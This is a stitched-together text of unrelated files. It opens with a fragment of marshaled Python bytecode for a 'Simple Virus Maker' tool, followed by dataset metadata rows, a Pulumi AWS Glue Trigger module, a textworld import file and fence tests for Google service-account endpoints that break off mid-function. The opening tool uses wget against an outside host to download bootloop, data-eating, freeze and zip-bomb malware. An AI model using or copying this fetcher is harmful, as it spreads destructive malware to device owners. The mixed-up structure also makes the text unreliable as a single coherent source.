0\x83\x01\x00\x01e\x00\x00j\x08\x00d\x18\x00\x83\x01\x00\x01d\x10\x00e\x04\x00e\x02\x00e\x04\x00e\x05\x00e\x02\x00e\x03\x00f\x06\x00\x16GHe\x01\x00j\t\x00\x83\x00\x00\x01nJ\x01e\x07\x00d\x19\x00k\x02\x00s~\x02e\x07\x00d\x1a\x00k\x02\x00r\xe8\x02d\r\x00e\x04\x00e\x02\x00e\x04\x00e\x05\x00e\x02\x00e\x03\x00f\x06\x00\x16GHe\x00\x00j\x08\x00d\x1b\x00\x83\x01\x00\x01e\x00\x00j\x08\x00d\x1c\x00\x83\x01\x00\x01e\x00\x00j\x08\x00d\x1d\x00\x83\x01\x00\x01d\x10\x00e\x04\x00e\x02\x00e\x04\x00e\x05\x00e\x02\x00e\x03\x00f\x06\x00\x16GHe\x01\x00j\t\x00\x83\x00\x00\x01n\xc8\x00e\x07\x00d\x1e\x00k\x02\x00s\x00\x03e\x07\x00d\x1f\x00k\x02\x00r]\x03d\r\x00e\x04\x00e\x02\x00e\x04\x00e\x05\x00e\x02\x00e\x03\x00f\x06\x00\x16GHe\x00\x00j\x08\x00d \x00\x83\x01\x00\x01e\x00\x00j\x08\x00d!\x00\x83\x01\x00\x01d\x10\x00e\x04\x00e\x02\x00e\x04\x00e\x05\x00e\x02\x00e\x03\x00f\x06\x00\x16GHe\x01\x00j\t\x00\x83\x00\x00\x01nS\x00d"\x00e\x04\x00e\x02\x00e\x04\x00e\x02\x00e\x04\x00e\x05\x00e\x03\x00f\x07\x00\x16GHe\n\x00j\x0b\x00d#\x00\x83\x01\x00\x01d$\x00e\x04\x00e\x02\x00e\x04\x00e\x02\x00e\x04\x00e\x05\x00e\x03\x00f\x07\x00\x16GHe\x01\x00j\t\x00\x83\x00\x00\x01d\x01\x00S(%\x00\x00\x00i\xff\xff\xff\xffNs\x07\x00\x00\x00\x1b[1;31ms\x04\x00\x00\x00\x1b[0ms\x07\x00\x00\x00\x1b[1;33ms\x07\x00\x00\x00\x1b[1;37ms9\x00\x00\x00%s+---------------------------------------------------+%ssA\x00\x00\x00%s||[#]%s--------------%s[ VBug Maker ]%s---------------%s[#]||%ssA\x00\x00\x00%s||%s |___________%s[ Simple Virus Maker ]%s____________|%s ||%ssA\x00\x00\x00%s||%s |____________%s[ Anvima * Session ]%s_____________|%s ||%ss}\x00\x00\x00 %s[%s*%s] %s(%sB%s)%sootloop %s| %s(%sD%s)%sata-Eater %s| %s(%sF%s)%sreeze %s| %s(%sBO%s)%smb-Zip %s| %s(%sE%s)%slite %s:%s t\x01\x00\x00\x00Bt\x01\x00\x00\x00bs\'\x00\x00\x00\n %s[%s+%s]%s 
Download the virus%s...%ss3\x00\x00\x00wget -q http://override.waper.co/files/bootloop.apks?\x00\x00\x00mkdir virus/bootloop;mv bootloop.apk virus/bootloop/bootloop.shs\x16\x00\x00\x00 %s[%s+%s]%s Done%s.%st\x01\x00\x00\x00Dt\x01\x00\x00\x00ds3\x00\x00\x00wget -q http://override.waper.co/files/dateater.apksE\x00\x00\x00mkdir virus/data-eater;mv dateater.apk virus/data-eater/data-eater.sht\x01\x00\x00\x00Ft\x01\x00\x00\x00fs1\x00\x00\x00wget -q http://override.waper.co/files/freeze.apks8\x00\x00\x00mkdir virus/freeze;mv freeze.apk virus/freeze/freeze.apkt\x02\x00\x00\x00BOt\x02\x00\x00\x00bos-\x00\x00\x00wget -q http://override.waper.co/files/42.zips-\x00\x00\x00wget -q http://override.waper.co/files/42.apks]\x00\x00\x00mkdir virus/bomb-zip;mv 42.zip virus/bomb-zip/bom-zip.zip;mv 42.apk virus/bomb-zip/README.txtt\x01\x00\x00\x00Et\x01\x00\x00\x00es0\x00\x00\x00wget -q http://override.waper.co/files/31337.apks4\x00\x00\x00mkdir virus/ELITE;mv 31337.apk virus/ELITE/elite.apks&\x00\x00\x00%s[%s%s]%s ERROR%s:%s Wrong Input...%si\x02\x00\x00\x00s,\x00\x00\x00%s[%s!%s]%s ERROR%s:%s Exit the Program...%s(\x0c\x00\x00\x00t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x01\x00\x00\x00Rt\x01\x00\x00\x00Nt\x01\x00\x00\x00Yt\x01\x00\x00\x00Gt\t\x00\x00\x00raw_inputt\r\x00\x00\x00type_of_virust\x06\x00\x00\x00systemt\x04\x00\x00\x00exitt\x04\x00\x00\x00timet\x05\x00\x00\x00sleep(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00t\x08\x00\x00\x00\x02\x00\x00\x00s^\x00\x00\x00\x0c\x01\x0c\x03\x06\x01\x06\x01\x06\x01\x06\x02\x0f\x01\x1b\x01\x1b\x01\x1b\x01\x0f\x01\x01\x01g\x02\x18\x01\x1b\x01\r\x01\r\x01\x1b\x01\r\x02\x18\x01\x1b\x01\r\x01\r\x01\x1b\x01\r\x02\x18\x01\x1b\x01\r\x01\r\x01\x1b\x01\r\x02\x18\x01\x1b\x01\r\x01\r\x01\r\x01\x1b\x01\r\x02\x18\x01\x1b\x01\r\x01\r\x01\x1b\x01\r\x03\x1e\x01\r\x01\x1e\x01'''))
| 1,086.6
| 5,389
| 0.742315
| 1,174
| 5,433
| 3.391823
| 0.142249
| 0.143144
| 0.127072
| 0.10899
| 0.617027
| 0.593169
| 0.559769
| 0.54445
| 0.520844
| 0.432446
| 0
| 0.339309
| 0.014357
| 5,433
| 4
| 5,390
| 1,358.25
| 0.404295
| 0.004233
| 0
| 0
| 0
| 0.5
| 0.991494
| 0.829512
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
ed33b5719e4ddc712f879e8f5df1f32866885f13
| 15,205
|
py
|
Python
|
sdk/python/pulumi_aws/glue/trigger.py
|
JakeGinnivan/pulumi-aws
|
c91ef78932964ac74eda7f5da81f65b0f1798c93
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/glue/trigger.py
|
JakeGinnivan/pulumi-aws
|
c91ef78932964ac74eda7f5da81f65b0f1798c93
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/glue/trigger.py
|
JakeGinnivan/pulumi-aws
|
c91ef78932964ac74eda7f5da81f65b0f1798c93
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class Trigger(pulumi.CustomResource):
actions: pulumi.Output[list]
"""
List of actions initiated by this trigger when it fires. Defined below.
* `arguments` (`dict`) - Arguments to be passed to the job. You can specify arguments here that your own job-execution script consumes, as well as arguments that AWS Glue itself consumes.
* `crawlerName` (`str`) - The name of the crawler to be executed. Conflicts with `job_name`.
* `jobName` (`str`) - The name of a job to be executed. Conflicts with `crawler_name`.
* `timeout` (`float`) - The job run timeout in minutes. It overrides the timeout value of the job.
"""
arn: pulumi.Output[str]
"""
Amazon Resource Name (ARN) of Glue Trigger
"""
description: pulumi.Output[str]
"""
A description of the new trigger.
"""
enabled: pulumi.Output[bool]
"""
Start the trigger. Defaults to `true`. Not valid to disable for `ON_DEMAND` type.
"""
name: pulumi.Output[str]
"""
The name of the trigger.
"""
predicate: pulumi.Output[dict]
"""
A predicate to specify when the new trigger should fire. Required when trigger type is `CONDITIONAL`. Defined below.
* `conditions` (`list`) - A list of the conditions that determine when the trigger will fire. Defined below.
* `crawlState` (`str`) - The condition crawl state. Currently, the values supported are `RUNNING`, `SUCCEEDED`, `CANCELLED`, and `FAILED`. If this is specified, `crawler_name` must also be specified. Conflicts with `state`.
* `crawlerName` (`str`) - The name of the crawler to watch. If this is specified, `crawl_state` must also be specified. Conflicts with `job_name`.
* `jobName` (`str`) - The name of the job to watch. If this is specified, `state` must also be specified. Conflicts with `crawler_name`.
* `logicalOperator` (`str`) - A logical operator. Defaults to `EQUALS`.
* `state` (`str`) - The condition job state. Currently, the values supported are `SUCCEEDED`, `STOPPED`, `TIMEOUT` and `FAILED`. If this is specified, `job_name` must also be specified. Conflicts with `crawler_state`.
* `logical` (`str`) - How to handle multiple conditions. Defaults to `AND`. Valid values are `AND` or `ANY`.
"""
schedule: pulumi.Output[str]
"""
A cron expression used to specify the schedule. [Time-Based Schedules for Jobs and Crawlers](https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html)
"""
tags: pulumi.Output[dict]
"""
Key-value map of resource tags
"""
type: pulumi.Output[str]
"""
The type of trigger. Valid values are `CONDITIONAL`, `ON_DEMAND`, and `SCHEDULED`.
"""
workflow_name: pulumi.Output[str]
"""
A workflow with which the trigger should be associated. Every workflow graph (DAG) needs a starting trigger (`ON_DEMAND` or `SCHEDULED` type) and can contain multiple additional `CONDITIONAL` triggers.
"""
def __init__(__self__, resource_name, opts=None, actions=None, description=None, enabled=None, name=None, predicate=None, schedule=None, tags=None, type=None, workflow_name=None, __props__=None, __name__=None, __opts__=None):
"""
Manages a Glue Trigger resource.
## Example Usage
### Conditional Trigger
```python
import pulumi
import pulumi_aws as aws
example = aws.glue.Trigger("example",
actions=[{
"jobName": aws_glue_job["example1"]["name"],
}],
predicate={
"conditions": [{
"jobName": aws_glue_job["example2"]["name"],
"state": "SUCCEEDED",
}],
},
type="CONDITIONAL")
```
### On-Demand Trigger
```python
import pulumi
import pulumi_aws as aws
example = aws.glue.Trigger("example",
actions=[{
"jobName": aws_glue_job["example"]["name"],
}],
type="ON_DEMAND")
```
### Scheduled Trigger
```python
import pulumi
import pulumi_aws as aws
example = aws.glue.Trigger("example",
actions=[{
"jobName": aws_glue_job["example"]["name"],
}],
schedule="cron(15 12 * * ? *)",
type="SCHEDULED")
```
### Conditional Trigger with Crawler Action
```python
import pulumi
import pulumi_aws as aws
example = aws.glue.Trigger("example",
actions=[{
"crawlerName": aws_glue_crawler["example1"]["name"],
}],
predicate={
"conditions": [{
"jobName": aws_glue_job["example2"]["name"],
"state": "SUCCEEDED",
}],
},
type="CONDITIONAL")
```
### Conditional Trigger with Crawler Condition
```python
import pulumi
import pulumi_aws as aws
example = aws.glue.Trigger("example",
actions=[{
"jobName": aws_glue_job["example1"]["name"],
}],
predicate={
"conditions": [{
"crawlState": "SUCCEEDED",
"crawlerName": aws_glue_crawler["example2"]["name"],
}],
},
type="CONDITIONAL")
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[list] actions: List of actions initiated by this trigger when it fires. Defined below.
:param pulumi.Input[str] description: A description of the new trigger.
:param pulumi.Input[bool] enabled: Start the trigger. Defaults to `true`. Not valid to disable for `ON_DEMAND` type.
:param pulumi.Input[str] name: The name of the trigger.
:param pulumi.Input[dict] predicate: A predicate to specify when the new trigger should fire. Required when trigger type is `CONDITIONAL`. Defined below.
:param pulumi.Input[str] schedule: A cron expression used to specify the schedule. [Time-Based Schedules for Jobs and Crawlers](https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html)
:param pulumi.Input[dict] tags: Key-value map of resource tags
:param pulumi.Input[str] type: The type of trigger. Valid values are `CONDITIONAL`, `ON_DEMAND`, and `SCHEDULED`.
:param pulumi.Input[str] workflow_name: A workflow with which the trigger should be associated. Every workflow graph (DAG) needs a starting trigger (`ON_DEMAND` or `SCHEDULED` type) and can contain multiple additional `CONDITIONAL` triggers.
The **actions** object supports the following:
* `arguments` (`pulumi.Input[dict]`) - Arguments to be passed to the job. You can specify arguments here that your own job-execution script consumes, as well as arguments that AWS Glue itself consumes.
* `crawlerName` (`pulumi.Input[str]`) - The name of the crawler to be executed. Conflicts with `job_name`.
* `jobName` (`pulumi.Input[str]`) - The name of a job to be executed. Conflicts with `crawler_name`.
* `timeout` (`pulumi.Input[float]`) - The job run timeout in minutes. It overrides the timeout value of the job.
The **predicate** object supports the following:
* `conditions` (`pulumi.Input[list]`) - A list of the conditions that determine when the trigger will fire. Defined below.
* `crawlState` (`pulumi.Input[str]`) - The condition crawl state. Currently, the values supported are `RUNNING`, `SUCCEEDED`, `CANCELLED`, and `FAILED`. If this is specified, `crawler_name` must also be specified. Conflicts with `state`.
* `crawlerName` (`pulumi.Input[str]`) - The name of the crawler to watch. If this is specified, `crawl_state` must also be specified. Conflicts with `job_name`.
* `jobName` (`pulumi.Input[str]`) - The name of the job to watch. If this is specified, `state` must also be specified. Conflicts with `crawler_name`.
* `logicalOperator` (`pulumi.Input[str]`) - A logical operator. Defaults to `EQUALS`.
* `state` (`pulumi.Input[str]`) - The condition job state. Currently, the values supported are `SUCCEEDED`, `STOPPED`, `TIMEOUT` and `FAILED`. If this is specified, `job_name` must also be specified. Conflicts with `crawler_state`.
* `logical` (`pulumi.Input[str]`) - How to handle multiple conditions. Defaults to `AND`. Valid values are `AND` or `ANY`.
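For instance, a predicate that fires only after two jobs succeed could be
sketched as follows (the job names here are illustrative assumptions, not
values from this provider):
```python
predicate={
    "logical": "AND",
    "conditions": [
        {"jobName": "job-a", "state": "SUCCEEDED"},
        {"jobName": "job-b", "state": "SUCCEEDED"},
    ],
}
```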
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if actions is None:
raise TypeError("Missing required property 'actions'")
__props__['actions'] = actions
__props__['description'] = description
__props__['enabled'] = enabled
__props__['name'] = name
__props__['predicate'] = predicate
__props__['schedule'] = schedule
__props__['tags'] = tags
if type is None:
raise TypeError("Missing required property 'type'")
__props__['type'] = type
__props__['workflow_name'] = workflow_name
__props__['arn'] = None
super(Trigger, __self__).__init__(
'aws:glue/trigger:Trigger',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, actions=None, arn=None, description=None, enabled=None, name=None, predicate=None, schedule=None, tags=None, type=None, workflow_name=None):
"""
Get an existing Trigger resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[list] actions: List of actions initiated by this trigger when it fires. Defined below.
:param pulumi.Input[str] arn: Amazon Resource Name (ARN) of Glue Trigger
:param pulumi.Input[str] description: A description of the new trigger.
:param pulumi.Input[bool] enabled: Start the trigger. Defaults to `true`. Not valid to disable for `ON_DEMAND` type.
:param pulumi.Input[str] name: The name of the trigger.
:param pulumi.Input[dict] predicate: A predicate to specify when the new trigger should fire. Required when trigger type is `CONDITIONAL`. Defined below.
:param pulumi.Input[str] schedule: A cron expression used to specify the schedule. [Time-Based Schedules for Jobs and Crawlers](https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html)
:param pulumi.Input[dict] tags: Key-value map of resource tags
:param pulumi.Input[str] type: The type of trigger. Valid values are `CONDITIONAL`, `ON_DEMAND`, and `SCHEDULED`.
:param pulumi.Input[str] workflow_name: A workflow with which the trigger should be associated. Every workflow graph (DAG) needs a starting trigger (`ON_DEMAND` or `SCHEDULED` type) and can contain multiple additional `CONDITIONAL` triggers.
The **actions** object supports the following:
* `arguments` (`pulumi.Input[dict]`) - Arguments to be passed to the job. You can specify arguments here that your own job-execution script consumes, as well as arguments that AWS Glue itself consumes.
* `crawlerName` (`pulumi.Input[str]`) - The name of the crawler to be executed. Conflicts with `job_name`.
* `jobName` (`pulumi.Input[str]`) - The name of a job to be executed. Conflicts with `crawler_name`.
* `timeout` (`pulumi.Input[float]`) - The job run timeout in minutes. It overrides the timeout value of the job.
The **predicate** object supports the following:
* `conditions` (`pulumi.Input[list]`) - A list of the conditions that determine when the trigger will fire. Defined below.
* `crawlState` (`pulumi.Input[str]`) - The condition crawl state. Currently, the values supported are `RUNNING`, `SUCCEEDED`, `CANCELLED`, and `FAILED`. If this is specified, `crawler_name` must also be specified. Conflicts with `state`.
* `crawlerName` (`pulumi.Input[str]`) - The name of the crawler to watch. If this is specified, `crawl_state` must also be specified. Conflicts with `job_name`.
* `jobName` (`pulumi.Input[str]`) - The name of the job to watch. If this is specified, `state` must also be specified. Conflicts with `crawler_name`.
* `logicalOperator` (`pulumi.Input[str]`) - A logical operator. Defaults to `EQUALS`.
* `state` (`pulumi.Input[str]`) - The condition job state. Currently, the values supported are `SUCCEEDED`, `STOPPED`, `TIMEOUT` and `FAILED`. If this is specified, `job_name` must also be specified. Conflicts with `crawler_state`.
* `logical` (`pulumi.Input[str]`) - How to handle multiple conditions. Defaults to `AND`. Valid values are `AND` or `ANY`.
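A minimal lookup sketch (the resource name and provider ID below are
illustrative assumptions):
```python
import pulumi
import pulumi_aws as aws

existing = aws.glue.Trigger.get("existing-trigger", id="example-trigger-id")
```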
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["actions"] = actions
__props__["arn"] = arn
__props__["description"] = description
__props__["enabled"] = enabled
__props__["name"] = name
__props__["predicate"] = predicate
__props__["schedule"] = schedule
__props__["tags"] = tags
__props__["type"] = type
__props__["workflow_name"] = workflow_name
return Trigger(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 53.727915
| 250
| 0.643473
| 1,867
| 15,205
| 5.108731
| 0.124264
| 0.047285
| 0.039631
| 0.016356
| 0.806563
| 0.792619
| 0.782554
| 0.766408
| 0.746278
| 0.746278
| 0
| 0.000965
| 0.250444
| 15,205
| 282
| 251
| 53.91844
| 0.835922
| 0.538112
| 0
| 0.027778
| 1
| 0
| 0.141149
| 0.006999
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0.013889
| 0.083333
| 0.027778
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ed6a24f392ac6cea024b410e1255cd8d3d5e4ca3
| 311
|
py
|
Python
|
textworld/envs/wrappers/__init__.py
|
CORGI-lab/Learning_from_stories
|
183791971272fd919822ab43fc11369d9098fc69
|
[
"MIT"
] | null | null | null |
textworld/envs/wrappers/__init__.py
|
CORGI-lab/Learning_from_stories
|
183791971272fd919822ab43fc11369d9098fc69
|
[
"MIT"
] | null | null | null |
textworld/envs/wrappers/__init__.py
|
CORGI-lab/Learning_from_stories
|
183791971272fd919822ab43fc11369d9098fc69
|
[
"MIT"
] | null | null | null |
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT license.
from textworld.envs.wrappers.viewer import HtmlViewer
from textworld.envs.wrappers.recorder import Recorder
from textworld.envs.wrappers.filter import Filter
from textworld.envs.wrappers.tw_inform7 import TWInform7
| 34.555556
| 59
| 0.836013
| 41
| 311
| 6.317073
| 0.585366
| 0.200772
| 0.262548
| 0.3861
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007168
| 0.102894
| 311
| 8
| 60
| 38.875
| 0.921147
| 0.286174
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9c5de8adca73df0b1d8151439053aefa9d018a87
| 34,711
|
py
|
Python
|
tests/google/test_service_accounts.py
|
ADParedes/fence
|
81afd1914c483da5514d0bcc13ecbfda9758dd9f
|
[
"Apache-2.0"
] | null | null | null |
tests/google/test_service_accounts.py
|
ADParedes/fence
|
81afd1914c483da5514d0bcc13ecbfda9758dd9f
|
[
"Apache-2.0"
] | 1
|
2019-11-01T08:30:28.000Z
|
2019-11-01T08:30:28.000Z
|
tests/google/test_service_accounts.py
|
ADParedes/fence
|
81afd1914c483da5514d0bcc13ecbfda9758dd9f
|
[
"Apache-2.0"
] | 3
|
2019-10-16T04:27:54.000Z
|
2019-10-24T02:27:52.000Z
|
"""
Tests for the /google/service_accounts endpoints.
NOTE: You can use the following helper assert functions when developing more
tests:
_assert_expected_service_account_response_structure(data)
- Verifies that the structure of the response represents a service
account
- This is essentially a schema check against:
{
"service_account_email": "string",
"google_project_id": "string",
"project_access": [
"string"
]
}
_assert_expected_error_response_structure(data, project_access)
- Verifies that the structure of the response represents an
error response with info
- provide which projects you expect error information for in
project_access
- This is essentially a schema check against:
{
"success": bool,
"errors": {
"service_account_email": {
"status": int,
"error": "string",
"error_description": "string"
},
"google_project_id": {
"status": int,
"error": "string",
"error_description": "string"
},
"project_access": {
"ProjectA": {
"status": int,
"error": "string",
"error_description": "string"
},
"ProjectB": {
"status": int,
"error": "string",
"error_description": "string"
},
...
}
}
}
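Example usage of the error-structure helper (illustrative; the client, JWT,
request payload, and project_access list come from this suite's fixtures):
    response = client.post(
        "/google/service_accounts",
        headers={"Authorization": "Bearer " + encoded_creds_jwt},
        data=json.dumps(invalid_service_account),
        content_type="application/json",
    )
    _assert_expected_error_response_structure(response, project_access)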
"""
import json
import pytest
import time
from datetime import datetime
from io import StringIO
from urllib.parse import quote
from fence.models import (
Bucket,
Project,
ProjectToBucket,
GoogleBucketAccessGroup,
UserServiceAccount,
ServiceAccountAccessPrivilege,
ServiceAccountToGoogleBucketAccessGroup,
)
from fence.config import config
from unittest.mock import MagicMock, patch, mock_open
EXPECTED_ERROR_RESPONSE_KEYS = set(["status", "error", "error_description"])
def test_google_service_account_monitor_none(
client, app, encoded_jwt_service_accounts_access, monkeypatch
):
"""
Test that the monitoring endpoint returns a 404 when no creds
exist.
"""
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
test_file = None
monkeypatch.setitem(
config, "CIRRUS_CFG", {"GOOGLE_APPLICATION_CREDENTIALS": test_file}
)
response = client.get(
"/google/service_accounts/monitor",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
)
assert response.status_code == 404
def test_google_service_account_monitor(
client, app, encoded_jwt_service_accounts_access, monkeypatch
):
"""
Test that the monitoring endpoint returns the service account email when
given valid creds.
"""
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
creds_file = '{"client_email": "test123@example.com"}'
path_mock = MagicMock()
path_mock.return_value.path.return_value.exists.return_value = True
mock_path = patch("fence.blueprints.google.os", path_mock)
# mock_path = patch('os.path.exists', True)
mocked_open = patch("builtins.open", mock_open(read_data=creds_file))
monkeypatch.setitem(config, "CIRRUS_CFG", {"GOOGLE_APPLICATION_CREDENTIALS": "."})
mocked_open.start()
mock_path.start()
response = client.get(
"/google/service_accounts/monitor",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
)
mocked_open.stop()
mock_path.stop()
assert response.status_code == 200
assert response.json and "service_account_email" in response.json
assert response.json["service_account_email"] == "test123@example.com"
def test_patch_service_account_no_project_change(
client,
app,
db_session,
encoded_jwt_service_accounts_access,
register_user_service_account,
user_can_manage_service_account_mock,
valid_user_service_account_mock,
revoke_user_service_account_from_google_mock,
add_user_service_account_to_google_mock,
):
"""
Test that patching with no project_access argument successfully extends
access for all projects the service account currently has access to.
"""
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
service_account = register_user_service_account["service_account"]
response = client.patch(
"/google/service_accounts/{}".format(quote(service_account.email)),
headers={"Authorization": "Bearer " + encoded_creds_jwt},
content_type="application/json",
)
# check if success
assert str(response.status_code).startswith("2")
service_account_accesses = (
db_session.query(ServiceAccountToGoogleBucketAccessGroup).filter_by(
service_account_id=service_account.id
)
).all()
# ensure access is the same
assert len(service_account_accesses) == len(
register_user_service_account["bucket_access_groups"]
)
# make sure we actually extended access past the current time
for access in service_account_accesses:
assert access.expires > int(time.time())
def test_patch_service_account_expires_in(
client,
app,
db_session,
encoded_jwt_service_accounts_access,
register_user_service_account,
user_can_manage_service_account_mock,
valid_user_service_account_mock,
revoke_user_service_account_from_google_mock,
add_user_service_account_to_google_mock,
):
"""
Test that patching with a valid expires_in successfully extends
access, and patching with an invalid expires_in does not.
"""
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
service_account = register_user_service_account["service_account"]
# invalid expires_in: should fail
requested_exp = "abc" # expires_in must be int >0
response = client.patch(
"/google/service_accounts/{}?expires_in={}".format(
quote(service_account.email), requested_exp
),
headers={"Authorization": "Bearer " + encoded_creds_jwt},
content_type="application/json",
)
assert response.status_code == 400 # check if failure
# valid expires_in: should succeed
requested_exp = 60
response = client.patch(
"/google/service_accounts/{}?expires_in={}".format(
quote(service_account.email), requested_exp
),
headers={"Authorization": "Bearer " + encoded_creds_jwt},
content_type="application/json",
)
assert str(response.status_code).startswith("2") # check if success
# make sure the access was extended by the requested time
# (allow up to 10 sec for runtime)
service_account_accesses = (
db_session.query(ServiceAccountToGoogleBucketAccessGroup).filter_by(
service_account_id=service_account.id
)
).all()
for access in service_account_accesses:
diff = access.expires - int(time.time())
assert requested_exp <= diff <= requested_exp + 10
def test_patch_service_account_dry_run_valid_empty_arg(
client,
app,
db_session,
encoded_jwt_service_accounts_access,
register_user_service_account,
user_can_manage_service_account_mock,
valid_user_service_account_mock,
revoke_user_service_account_from_google_mock,
add_user_service_account_to_google_mock,
):
"""
Test that patching with no project_access argument against _dry_run reports
that the PATCH would successfully extend access.
"""
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
service_account = register_user_service_account["service_account"]
response = client.patch(
"/google/service_accounts/_dry_run/{}".format(quote(service_account.email)),
headers={"Authorization": "Bearer " + encoded_creds_jwt},
content_type="application/json",
)
# check if success
assert str(response.status_code).startswith("2")
assert "success" in response.json
assert response.json.get("success")
service_account_accesses = (
db_session.query(ServiceAccountToGoogleBucketAccessGroup).filter_by(
service_account_id=service_account.id
)
).all()
# ensure access is the same as before
assert len(service_account_accesses) == len(
register_user_service_account["bucket_access_groups"]
)
def test_patch_service_account_dry_run_valid_new_access(
client,
app,
db_session,
encoded_jwt_service_accounts_access,
register_user_service_account,
user_can_manage_service_account_mock,
valid_user_service_account_mock,
revoke_user_service_account_from_google_mock,
add_user_service_account_to_google_mock,
):
"""
Test that patching with new project_access against _dry_run reports that the
PATCH would successfully extend access if it's valid, BUT make sure it does
NOT actually change the access.
"""
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
service_account = register_user_service_account["service_account"]
response = client.patch(
"/google/service_accounts/_dry_run/{}".format(quote(service_account.email)),
headers={"Authorization": "Bearer " + encoded_creds_jwt},
content_type="application/json",
data={"project_access": ["another-valid-project"]},
)
# check if success
assert str(response.status_code).startswith("2")
assert "success" in response.json
assert response.json.get("success")
service_account_accesses = (
db_session.query(ServiceAccountToGoogleBucketAccessGroup).filter_by(
service_account_id=service_account.id
)
).all()
# ensure access is the same as before even though it was valid (since it's
# the dry_run endpoint)
assert len(service_account_accesses) == len(
register_user_service_account["bucket_access_groups"]
)
def test_patch_service_account_dry_run_invalid(
client,
app,
db_session,
encoded_jwt_service_accounts_access,
register_user_service_account,
user_can_manage_service_account_mock,
invalid_user_service_account_mock,
revoke_user_service_account_from_google_mock,
add_user_service_account_to_google_mock,
):
"""
Test that patching against dry_run when it would be invalid does not modify access.
"""
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
service_account = register_user_service_account["service_account"]
response = client.patch(
"/google/service_accounts/_dry_run/{}".format(quote(service_account.email)),
headers={"Authorization": "Bearer " + encoded_creds_jwt},
content_type="application/json",
data=json.dumps({"project_access": ["this-project-doesnt-exist"]}),
)
# check if success
assert str(response.status_code).startswith("4")
assert "success" in response.json
assert not response.json.get("success")
service_account_accesses = (
db_session.query(ServiceAccountToGoogleBucketAccessGroup).filter_by(
service_account_id=service_account.id
)
).all()
# ensure access is the same
assert len(service_account_accesses) == len(
register_user_service_account["bucket_access_groups"]
)
def test_patch_service_account_remove_all_access(
client,
app,
db_session,
encoded_jwt_service_accounts_access,
register_user_service_account,
user_can_manage_service_account_mock,
valid_user_service_account_mock,
revoke_user_service_account_from_google_mock,
add_user_service_account_to_google_mock,
):
"""
Test that patching with project_access as an empty list successfully removes
the service account's access to all projects it currently has access to.
"""
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
service_account = register_user_service_account["service_account"]
response = client.patch(
"/google/service_accounts/{}".format(quote(service_account.email)),
headers={"Authorization": "Bearer " + encoded_creds_jwt},
content_type="application/json",
data=json.dumps({"project_access": []}),
)
# check if success
assert str(response.status_code).startswith("2")
service_account_accesses = (
